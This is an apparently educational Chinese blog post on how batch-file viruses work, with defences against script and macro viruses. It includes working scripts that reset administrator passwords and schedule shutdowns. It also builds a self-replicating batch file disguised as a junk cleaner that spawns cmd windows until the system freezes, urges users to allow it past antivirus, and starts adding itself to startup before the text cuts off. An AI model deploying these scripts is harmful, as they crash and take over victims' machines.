<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon16.ico">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"default"},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":true,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":{"gitalk":{"order":-2}},"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":-1,"unescape":false,"preload":true},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content=".bat文件是DOS下的批处理文件。批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为.bat或.cmd。在命令提示下输入批处理文件的名称，或者双击该批处理文件，系统就会调用cmd.exe按照该文件中各个命令出现的顺序依次运行它们。使用批处理文件或脚本，可以简化日常或重复性任务。攻击者通常通过批处理文件的编写来实现多工具的组合入侵、自动入侵及结果提取等功能。">
<meta property="og:type" content="article">
<meta property="og:title" content="批处理病毒攻防机理">
<meta property="og:url" content="http://example.com/posts/82a69c8b.html">
<meta property="og:site_name" content="v5le0n9&#39;s garden">
<meta property="og:description" content=".bat文件是DOS下的批处理文件。批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为.bat或.cmd。在命令提示下输入批处理文件的名称，或者双击该批处理文件，系统就会调用cmd.exe按照该文件中各个命令出现的顺序依次运行它们。使用批处理文件或脚本，可以简化日常或重复性任务。攻击者通常通过批处理文件的编写来实现多工具的组合入侵、自动入侵及结果提取等功能。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/posts/82a69c8b/1.1.1.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/1.1.2.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/1.1.3.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/1.1.4.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/1.1.5.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/1.1.6.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/1.1.7.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/1.1.8.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.1.1.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.1.2.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.1.3.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.1.4.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.1.5.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.2.1.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.2.2.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.2.3.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.2.4.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/2.2.5.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/4.2.1.png">
<meta property="og:image" content="http://example.com/posts/82a69c8b/5.1.1.png">
<meta property="article:published_time" content="2022-06-30T06:13:22.833Z">
<meta property="article:modified_time" content="2022-11-17T06:26:56.064Z">
<meta property="article:author" content="v5le0n9">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/posts/82a69c8b/1.1.1.png">

<link rel="canonical" href="http://example.com/posts/82a69c8b.html">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>批处理病毒攻防机理 | v5le0n9's garden</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="v5le0n9's garden" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">v5le0n9's garden</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">小凉的秘密基地</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/v5le0n9" class="github-corner" title="Follow me on GitHub" aria-label="Follow me on GitHub" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/posts/82a69c8b.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="v5le0n9">
      <meta itemprop="description" content="小呀小二郎呀背着个书包上学堂">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="v5le0n9's garden">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          批处理病毒攻防机理
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2022-06-30 14:13:22" itemprop="dateCreated datePublished" datetime="2022-06-30T14:13:22+08:00">2022-06-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-11-17 14:26:56" itemprop="dateModified" datetime="2022-11-17T14:26:56+08:00">2022-11-17</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Windows%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">Windows安全</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>9.2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>8 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><code>.bat</code>文件是DOS下的批处理文件。批处理文件是无格式的文本文件，它包含一条或多条命令。它的文件扩展名为<code>.bat</code>或<code>.cmd</code>。在命令提示下输入批处理文件的名称，或者双击该批处理文件，系统就会调用<code>cmd.exe</code>按照该文件中各个命令出现的顺序依次运行它们。使用批处理文件或脚本，可以简化日常或重复性任务。攻击者通常通过批处理文件的编写来实现多工具的组合入侵、自动入侵及结果提取等功能。</p>
<span id="more"></span>
<h1 id="1-批处理病毒机理"><a href="#1-批处理病毒机理" class="headerlink" title="1. 批处理病毒机理"></a>1. 批处理病毒机理</h1><h2 id="1-1-修改密码和定时关机脚本"><a href="#1-1-修改密码和定时关机脚本" class="headerlink" title="1.1 修改密码和定时关机脚本"></a>1.1 修改密码和定时关机脚本</h2><p>编写并运行批处理脚本的基本步骤如下：</p>
<ol>
<li>新建文本文档</li>
<li>输入批处理命令</li>
<li>将扩展名改为<code>.bat</code></li>
<li>双击批处理文件运行</li>
</ol>
<p>关机命令为<code>shutdown</code>，基本命令为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">//现在让系统600s后关机</span><br><span class="line">shutdown -s -t 600</span><br><span class="line"></span><br><span class="line">//终止关闭计算机</span><br><span class="line">shutdown -a</span><br></pre></td></tr></table></figure>
<img src="/posts/82a69c8b/1.1.1.png" class="" title="关机命令">
<p>更多有关<code>shutdown</code>的用法可通过CMD查看。</p>
<img src="/posts/82a69c8b/1.1.2.png" class="" title="shutdown命令用法">
<p>运用在批处理脚本中，也是一样的。如果需要终止关机需在CMD输入相应命令。</p>
<img src="/posts/82a69c8b/1.1.3.png" class="" title="关机命令">
<img src="/posts/82a69c8b/1.1.4.png" class="" title="关机命令">
<p>了解了基本的批处理脚本的运行方式后，接下来进行一个比较完整的bat脚本制作过程，这些代码对批处理功能熟悉和脚本病毒逆向分析都有帮助。</p>
<p>新建一个<code>v5le0n9.bat</code>，程序编写如下所示：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">color 0a</span><br><span class="line">title v5le0n9在此</span><br><span class="line"></span><br><span class="line">echo ===================================</span><br><span class="line">echo                 菜单</span><br><span class="line">echo           1.修改管理员密码</span><br><span class="line">echo           2.定时关机</span><br><span class="line">echo           3.退出本程序</span><br><span class="line">echo ===================================</span><br><span class="line"></span><br><span class="line">pause</span><br></pre></td></tr></table></figure>
<p>其中“@echo off”表示关闭回显，“color 0a”表示设置颜色。双击文件显示如下：</p>
<img src="/posts/82a69c8b/1.1.5.png" class="" title="显示结果">
<p>继续完善代码，可以让用户进行选择，达到交互目的。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">color 0a</span><br><span class="line">title v5le0n9在此</span><br><span class="line"></span><br><span class="line">echo ===================================</span><br><span class="line">echo                 菜单</span><br><span class="line">echo           1.修改管理员密码</span><br><span class="line">echo           2.定时关机</span><br><span class="line">echo           3.退出本程序</span><br><span class="line">echo ===================================</span><br><span class="line"></span><br><span class="line">set /p num=您的选择是：</span><br><span class="line"></span><br><span class="line">pause</span><br></pre></td></tr></table></figure>
<p>“set /p num=您的选择是：”表示设置变量num等待用户输入，其中“/p”表示暂停并等待用户输入，“num=您的选择是：”表示用户在“您的选择是：”后输入的值赋给num。</p>
<img src="/posts/82a69c8b/1.1.6.png" class="" title="显示结果">
<p>接下来就是选择选项后要执行的命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">//修改管理员密码为123456</span><br><span class="line">net user administrator 123456</span><br><span class="line"></span><br><span class="line">//100s后关机</span><br><span class="line">shutdown -s -t 100</span><br><span class="line"></span><br><span class="line">//退出本程序</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>
<p>知道这些命令后再将这些命令放入到批处理脚本中。其中“&gt;nul”表示不输出运行提示信息。虽然goto语句不提倡使用，但某些情况还是挺便捷的。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">color 0a</span><br><span class="line">title v5le0n9在此</span><br><span class="line"></span><br><span class="line">:menu</span><br><span class="line">echo ===================================</span><br><span class="line">echo                 菜单</span><br><span class="line">echo           1.修改管理员密码</span><br><span class="line">echo           2.定时关机</span><br><span class="line">echo           3.退出本程序</span><br><span class="line">echo ===================================</span><br><span class="line"></span><br><span class="line">set /p num=您的选择是：</span><br><span class="line">if &quot;%num%&quot;==&quot;1&quot; goto 1</span><br><span class="line">if &quot;%num%&quot;==&quot;2&quot; goto 2</span><br><span class="line">if &quot;%num%&quot;==&quot;3&quot; goto 3</span><br><span class="line"></span><br><span class="line">:1</span><br><span class="line">net user administrator 123456 &gt; nul</span><br><span class="line">echo 您的密码已经设置成功！</span><br><span class="line">pause</span><br><span class="line">goto menu</span><br><span class="line"></span><br><span class="line">:2</span><br><span class="line">shutdown -s -t 100</span><br><span class="line">goto menu</span><br><span class="line"></span><br><span class="line">:3</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>
<img src="/posts/82a69c8b/1.1.7.png" class="" title="显示结果">
<p>显示拒绝访问，并且重启发现密码没有修改成功，这是因为普通用户没有权限。需要“以管理员身份运行”批处理脚本才能修改成功。</p>
<img src="/posts/82a69c8b/1.1.8.png" class="" title="显示结果">
<p>继续完善脚本功能：</p>
<ul>
<li>增加“cls”命令清屏</li>
<li>为了避免输入其它数字会从头执行到尾，补充一个提示信息</li>
<li>最后补充设置的用户名和新密码，关机时间等</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">color 0a</span><br><span class="line">title v5le0n9在此</span><br><span class="line"></span><br><span class="line">:menu</span><br><span class="line">cls</span><br><span class="line">echo ===================================</span><br><span class="line">echo                 菜单</span><br><span class="line">echo           1.修改管理员密码</span><br><span class="line">echo           2.定时关机</span><br><span class="line">echo           3.退出本程序</span><br><span class="line">echo ===================================</span><br><span class="line"></span><br><span class="line">set /p num=您的选择是：</span><br><span class="line">if &quot;%num%&quot;==&quot;1&quot; goto 1</span><br><span class="line">if &quot;%num%&quot;==&quot;2&quot; goto 2</span><br><span class="line">if &quot;%num%&quot;==&quot;3&quot; goto 3</span><br><span class="line"></span><br><span class="line">echo 您好！请输入1-3正确的数字</span><br><span class="line">pause</span><br><span class="line">goto menu</span><br><span class="line"></span><br><span class="line">:1</span><br><span class="line">set /p u=请输入用户名:</span><br><span class="line">set /p p=请输入新密码:</span><br><span class="line">net user %u% %p% &gt;nul</span><br><span class="line">echo 您的密码已经设置成功！</span><br><span class="line">pause</span><br><span class="line">goto menu</span><br><span class="line"></span><br><span class="line">:2</span><br><span class="line">set /p time=请输入时间:</span><br><span class="line">shutdown -s -t %time%</span><br><span class="line">goto menu</span><br><span class="line"></span><br><span class="line">:3</span><br><span class="line">exit</span><br></pre></td></tr></table></figure>
<h2 id="1-2-脚本病毒防御机制"><a href="#1-2-脚本病毒防御机制" class="headerlink" title="1.2 脚本病毒防御机制"></a>1.2 脚本病毒防御机制</h2><p>上面主要介绍了批处理脚本实现关机和修改管理员密码的功能，但在真正的网络攻防过程中，脚本病毒和宏病毒更常见，这里分享下它们的防御方法。</p>
<p>脚本病毒主要采用脚本语言设计的计算机病毒。现在流行的脚本病毒大都是利用JavaScript和VBScript脚本语言编写。实际上在早期的系统中，病毒就已经开始利用脚本进行传播和破坏，不过专门的脚本型病毒并不常见。但是在脚本应用无所不在的今天，脚本病毒却成为危害大、传播广的病毒，特别是当它们和一些传统的进行恶性破坏的病毒如CIH相结合时，其危害就更严重了。</p>
<p>随着计算机系统软件技术的发展，新的病毒技术也应运而生，特别是结合脚本技术的病毒更让人防不胜防，比如在APT中鱼叉式钓鱼邮件结合宏病毒(Office文档)就很常见。由于脚本语言的易用性，并且脚本在现有应用系统中特别是Internet应用中占据了重要地位，脚本病毒也成为互联网病毒中最为流行的网络病毒之一。常见脚本文件后缀有：<code>.VBS</code>、<code>.VBE</code>、<code>.JS</code>、<code>.BAT</code>、<code>.CMD</code>。</p>
<p>常见的防御措施包括：</p>
<ul>
<li>防范VBS(Visual Basic Script)脚本病毒，比如禁用文件系统对象<code>regsvr32 scrrun.dll/u</code></li>
<li>在浏览器设置中将ActiveX插件和控件以及JS相关功能禁止掉，这样可以避免一些恶意代码的攻击，不过也会限制一些制作精美的动态网页</li>
<li>及时升级系统和浏览器补丁，选择一款好的防病毒软件并做好及时升级</li>
<li>防止鱼叉式钓鱼邮件攻击，不要轻易去浏览或点击一些来历不明的网站、邮件、文件，这样大部分的恶意代码都会被我们拒之“机”外</li>
<li>小心处理Office文档，除非确认文档来源可靠，充分了解打开文档的后果，否则务必不要开启Office启用宏代码</li>
<li>使用云沙箱和本地安全软件对可疑文件进行检测</li>
<li>提升安全意识，尤其内部人员的安全意识</li>
</ul>
<h1 id="2-自启动恶意攻击机理"><a href="#2-自启动恶意攻击机理" class="headerlink" title="2. 自启动恶意攻击机理"></a>2. 自启动恶意攻击机理</h1><p>当计算机重启后，病毒自启动是一个重要的功能。常用方法包括：</p>
<ul>
<li><p>病毒融合Autoruns自启动机制</p>
</li>
<li><p>利用系统自动播放机制<code>Autorun.inf</code></p>
<p>比如U盘病毒或光盘病毒就是利用U盘或光盘的自动播放功能。目前，也有一些U盘插入后，不需要双击U盘，里面的程序就会自启动。</p>
</li>
<li><p>在其它可执行文件嵌入少量触发代码</p>
<p>修改引入函数节启动DLL病毒文件(添加相应结构，初始化代码触发)，在特定PE文件代码段插入触发代码等(只需定位可执行程序并运行)。</p>
</li>
<li><p>DLL劫持：替换已有DLL文件</p>
<p>很多应用程序或操作系统执行时，都会去执行DLL文件，如果病毒将自身做成一个DLL文件，同时将系统DLL文件替换。可想而知，系统启动时，它是根据文件名启动的，此时病毒DLL文件就会拿到控制权，如果拿到控制权之后再进一步装载原始DLL文件，这样系统的本身机制也不会受影响，隐蔽性更强。该方法非常常见，甚至有一些病毒程序将反病毒软件可依赖的DLL文件替换。</p>
</li>
<li><p>利用0day或1day漏洞实现自启动</p>
</li>
</ul>
<h2 id="2-1-BAT脚本实现自启动"><a href="#2-1-BAT脚本实现自启动" class="headerlink" title="2.1 BAT脚本实现自启动"></a>2.1 BAT脚本实现自启动</h2><p>现在尝试编写一个伪装成“系统垃圾清理”的程序，它其实是一个导致系统死机的程序，其原理是不断打开CMD程序，占用系统资源从而导致死机，并且每次开机都会自启动。</p>
<p>创建批处理文件<code>clean.bat</code>，“::”表示注释，“&gt;”表示清空重写，“&gt;&gt;”表示追加命令到文件末尾，“%0”表示再次执行该程序。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">::每次运行clean.bat都重写自身，写入命令start cmd</span><br><span class="line">echo start cmd &gt; C:\Users\Leong\Desktop\clean.bat</span><br><span class="line"></span><br><span class="line">::每运行一次clean.bat增加一条start cmd命令</span><br><span class="line">echo start cmd &gt;&gt; C:\Users\Leong\Desktop\clean.bat</span><br><span class="line"></span><br><span class="line">::每运行一次clean.bat增加一条打开clean.bat命令</span><br><span class="line">echo %0 &gt;&gt; C:\Users\Leong\Desktop\clean.bat</span><br></pre></td></tr></table></figure>
<p>如果是命令1与命令3结合，第一次运行到命令1后，<code>clean.bat</code>被重写，命令3被清掉了，无法实现“不断打开CMD程序”。如果是命令2与命令3结合，第一次运行到命令2后，在文件末尾追加“start cmd”命令并打开CMD窗口，运行到命令3后，在文件末尾追加“C:\Users\Leong\Desktop\clean.bat”命令并打开<code>clean.bat</code>。此时<code>clean.bat</code>文件内容如下，但读入内存的旧的<code>clean.bat</code>已经执行完了。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">::每运行一次clean.bat增加一条start cmd命令</span><br><span class="line">echo start cmd &gt;&gt; C:\Users\Leong\Desktop\clean.bat</span><br><span class="line"></span><br><span class="line">::每运行一次clean.bat打开一个clean.bat</span><br><span class="line">echo %0 &gt;&gt; C:\Users\Leong\Desktop\clean.bat</span><br><span class="line"></span><br><span class="line">start cmd </span><br><span class="line">&quot;C:\Users\Leong\Desktop\clean.bat&quot; </span><br></pre></td></tr></table></figure>
<p>因为旧的<code>clean.bat</code>在执行结束前将新的<code>clean.bat</code>读入内存，紧接着从头开始运行新的<code>clean.bat</code>文件，到命令2后，在文件末尾追加“start cmd”命令并打开CMD窗口，运行到命令3后，在文件末尾追加“C:\Users\Leong\Desktop\clean.bat”命令并打开最新的<code>clean.bat</code>，此时程序更新为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">::每运行一次clean.bat增加一条start cmd命令</span><br><span class="line">echo start cmd &gt;&gt; C:\Users\Leong\Desktop\clean.bat</span><br><span class="line"></span><br><span class="line">::每运行一次clean.bat打开一个clean.bat</span><br><span class="line">echo %0 &gt;&gt; C:\Users\Leong\Desktop\clean.bat</span><br><span class="line"></span><br><span class="line">start cmd </span><br><span class="line">&quot;C:\Users\Leong\Desktop\clean.bat&quot; </span><br><span class="line">start cmd </span><br><span class="line">&quot;C:\Users\Leong\Desktop\clean.bat&quot; </span><br></pre></td></tr></table></figure>
<p>但新的<code>clean.bat</code>还有两条指令没执行完，在打开最新的<code>clean.bat</code>后继续往下执行。最新的<code>clean.bat</code>从头开始执行。以此类推，程序不断打开CMD窗口，占用系统资源，导致系统瘫痪。</p>
<img src="/posts/82a69c8b/2.1.1.png" class="" title="显示结果">
<p>当然也可以不用那么复杂，直接在批处理脚本中输入以下命令即可实现破坏功能：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">start cmd</span><br><span class="line">C:\Users\Leong\Desktop\clean.bat</span><br></pre></td></tr></table></figure>
<p>以上只能让用户死机一次，重启系统后，用户不再打开这个文件就不会中招。所以为了跳过用户启动的步骤，可以把程序放在自启动中。</p>
<p>errorlevel为预定义变量，随着系统变化而变化。如果为0表示上一条命令执行成功，如果为1表示上一条命令执行失败。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">title 系统垃圾清理</span><br><span class="line">color 2f</span><br><span class="line">echo 	=====若有杀毒软件恶意拦截，请选择【允许程序的所有操作】=====</span><br><span class="line">::echo.表示空行</span><br><span class="line">echo.</span><br><span class="line">echo.</span><br><span class="line"></span><br><span class="line">::Win 7及以上运行这个命令，将批处理脚本拷贝到自启动项中</span><br><span class="line">copy C:\Users\Leong\Desktop\clean.bat 